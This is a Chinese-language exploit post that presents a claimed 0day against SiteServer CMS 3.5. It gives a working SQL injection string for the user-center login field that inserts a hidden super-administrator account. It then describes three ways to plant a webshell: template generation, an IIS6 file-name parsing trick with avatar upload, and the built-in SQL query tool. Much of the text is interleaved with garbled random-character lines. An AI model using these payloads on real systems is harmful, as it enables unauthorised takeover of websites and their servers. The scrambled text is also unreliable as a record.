SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
7 x  w1 K- [5 F4 b: b4 x5 F
+ m1 t# s5 t3 @8 r% vstieserver官网:www.siteserver.cn



# f4 Z, j% p  f% L$ O: R6 B' l' j" t5 hEXP:

直接访问UserCenter/login.aspx
9 P" ~0 F7 a1 A& e' }3 I- Z! c3 n
. D" I& S: p. W# q) s) I9 ]
1 A* p+ ?! I. j
3 F% s$ X% y% b  y用户名处输入：
1 P$ ~" h- e% u' j/ ^7 U; j
( L* ?8 w, S5 C* v' S$ N123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
4 H5 ?* v; q9 i& p% s& O


密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

3 }; H9 v$ d6 q
3 g- f: M$ F4 X1 C- k  N! V
之后再访问后台SiteServer/login.aspx用插入的用户登陆
4 Z+ U/ y: L" ~( |/ d1 J( Z


/ }% U. q- A' `4 G5 _后台拿webshell的三种方法：
9 a  o5 J& D. M6 [% p' x- t. z* q
  V! |- I8 t+ o2 J. m, ^/ `; A% A! ], M一、

6 I- S% L6 B" [站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、
/ g3 m5 d8 G3 n. s7 R3 V  K, `# V
1 k7 q) j4 ?  G) l( V4 E0 `* @成员权限-》添加用户-》用户名为：1.asp

" q' f5 i, |( n1 U8 a% I! khttp://127.0.0.1/usercenter/
) ?. `& e  S% q% S
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
9 d$ q; F* g3 H
6 t4 r$ [2 j$ S( K（ps：后台添加用户时不会验证是否含有非法字符）
4 ^! Y4 Y, m4 ^  G! @. u. B3 t
) g, k- \. N7 q) s# |三、
# ]; `; C- x6 J  C" t- w
' E0 j9 @2 l8 y; j0 D系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
9 q( ]8 m8 c$ V2 z
系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
3 c" c, E% I- J0 q4 `1 K